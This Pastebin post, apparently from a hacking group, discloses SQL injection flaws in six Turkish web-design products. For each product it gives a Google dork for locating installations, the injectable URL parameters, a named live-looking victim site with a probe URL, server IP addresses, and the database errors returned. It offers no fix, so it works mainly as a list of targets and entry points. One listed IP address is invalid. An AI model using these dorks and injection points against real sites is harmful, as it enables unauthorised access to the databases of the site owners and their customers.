Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : DevSoft * BTMArgeBilişim * Algoritma İzmir * M.Ceylan MPlusNet * Webİcerik * Verisay * Web Designs SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 25/01/2019
- # Vendor Homepages of 6 Products :
- 1) devsoft.com.tr
- 2) btmbilisim.com ~ btmarge.com
- 3) algoritma.com.tr
- 4) mplusnet.com
- 5) webicerik.com
- 6) verisay.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # CXSecurity Exploit Reference Link :
- cxsecurity.com/issue/WLB-2019010237
- ####################################################################
- # There are 6 vendors that their products suffer from remote SQL Injection Vulnerabilities.
- ***************************************************************************
- 1) Web Yazılım Devsoft Turkish SQL Injection Vulnerability => [ Vendor ] => devsoft.com.tr
- 2) BTMArgeBilişim SQL Injection Vulnerability => [ Vendor ] => btmbilisim.com ~ btmarge.com
- 3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability => [ Vendor ] => algoritma.com.tr
- 4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability => [ Vendor ] => mplusnet.com
- 5) Webİcerik SQL Injection Vulnerability => [ Vendor ] => webicerik.com
- 6) Verisay Web Tasarım SQL Injection Vulnerability => [ Vendor ] => verisay.com
- ####################################################################
- # Google Dorks for Vulnerable Different Products ;
- ********************************************
- 1) intext:''Web Yazılım: Devsoft''
- 2) intext:''Tüm hakları saklıdır. BTM ARGE.''
- 3) intext:''www.algoritma.com.tr"
- 4) intext:''Powered By M.Ceylan'' site:tr
- 5) intext:Webİcerik Kurumsal
- 6) intext:Verisay Web Tasarım
- ####################################################################
- 1) Web Yazılım Devsoft SQL Injection Vulnerability
- ********************************************
- # Google Dork :
- ****************
- intext:''Web Yazılım: Devsoft''
- # SQL Injection Exploit :
- **********************
- /urunler.php?id=[SQL Injection]
- /page.php?id=[SQL Injection]
- /haber.php?id=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] adabroker.com.tr/urunler.php?id=90%27
- Note : (94.73.151.155) => There are 338 domains hosted on this server.
- Note : (159.69.91.216) => There are 44 domains hosted on this server.
- # SQL Database Error :
- *********************
- HATA : You have an error in your SQL syntax; check the manual that
- corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
- ####################################################################
- 2) BTMArgeBilişim SQL Injection Vulnerability
- ****************************************
- # Google Dork :
- ****************
- intext:''Tüm hakları saklıdır. BTM ARGE.''
- # SQL Injection Exploit :
- **********************
- /urun_detay.php?ID=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] habibmetal.com/urun_detay.php?ID=1'
- Note : (213.128.66.82) => There are 543 domains hosted on this server.
- Note : (35.243.133.12) => There are 2 domains hosted on this server.
- # SQL Database Error :
- **********************
- Notice: Undefined index: GBilgi in /home/habibmetal/public_html/incfi/inc_footer.php on line 12
- ####################################################################
- 3) Algoritma İnternet Reklam Ajansı İzmir SQL Injection Vulnerability
- **********************************************************
- # Google Dork :
- ****************
- intext:''www.algoritma.com.tr"
- # SQL Injection Exploit :
- **********************
- /urun.php?id=[SQL Injection]
- /urunler.php?id=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] ozgordal.com.tr/urun.php?id=15%27
- Note : (94.73.146.96) => There are 220 domains hosted on this server.
- Note : (93.187.206.206) => There are 693 domains hosted on this server.
- # SQL Database Error :
- **********************
- select * from yenilikler where id=15'
- select * from kategoriler where id=6'
- ####################################################################
- 4) M.Ceylan MPlusNet Alanya SQL Injection Vulnerability
- **************************************************
- # Google Dork :
- ****************
- intext:''Powered By M.Ceylan'' site:tr
- # SQL Injection Exploit :
- **********************
- /match.php?id_match=[SQL Injection]
- /lig/consult/istatistik.php?equipe=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] alanyaspor.org.tr/match.php?id_match=871%27
- Note : (31.169.73.251) => There are 1 domains hosted on this server.
- Note : (31.169.73.242) => There are 58 domains hosted on this server.
- # SQL Database Error :
- **********************
- Warning: mysql_fetch_array() expects parameter 1 to be
- resource, boolean given in /home/alanyaspor/public_html/match.php on line 62
- ####################################################################
- 5) Webİcerik SQL Injection Vulnerability
- ************************************
- # Google Dork :
- ****************
- intext:Webİcerik Kurumsal
- # SQL Injection Exploit :
- **********************
- /index.php?page=mod_video_goster&videoID=[SQL Injection]
- /ENG/index.php?page=icerikgoster&menuID=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- tcma.org.tr/index.php?page=mod_video_goster&videoID=12%27
- Note : (77.92.99.319) => 1 Domain.
- Note : (77.92.99.31) => There are 13 domains hosted on this server.
- # SQL Database Error :
- **********************
- Warning: mysql_fetch_assoc(): supplied argument is not a valid
- MySQL result resource in /var/www/vhosts/tcma.org.tr
- /tcma.org.tr/ENG/lib/emit_icerik.php on line 323
- ####################################################################
- 6) Verisay Web Tasarım SQL Injection Vulnerability
- *********************************************
- # Google Dork :
- ****************
- intext:Verisay Web Tasarım
- # SQL Injection Exploit :
- **********************
- /urunler/urun_detay.php?id=[SQL Injection]
- # Example Vulnerable Site :
- ************************
- [+] irena.com.tr/urunler/urun_detay.php?id=1465%27
- Note : (89.19.29.4) => There are 130 domains hosted on this server.
- Note : (52.19.74.107) => There are 10 domains hosted on this server.
- # SQL Database Error :
- **********************
- SELECT DEGER FROM gnl_ayarlar WHERE ANAHTAR='SITEBASLIK'
- Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean
- given in D:\vhosts\irena.com.tr\http\libs\lib-data.php on line 15
- SELECT d.ID, d.SIPARIS_ID, d.URUN_ID, d.MIKTAR, sto_kod AS KOD,
- sto_birim2_katsayi AS QUANTITY, sto_birim2_boy * sto_birim2_en *
- sto_birim2_yukseklik / 1000000000 AS VOLUME, sto_birim2_agirlik AS
- GROSSWEIGHT, sfiyat_fiyati AS UNIT_PRICE FROM sip_siparis_detay
- d LEFT JOIN sip_siparis s ON s.ID = d.SIPARIS_ID LEFT JOIN urun_urun
- u ON u.ID = d.URUN_ID WHERE DURUM = 0 AND s.MUSTERI_ID = ''
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement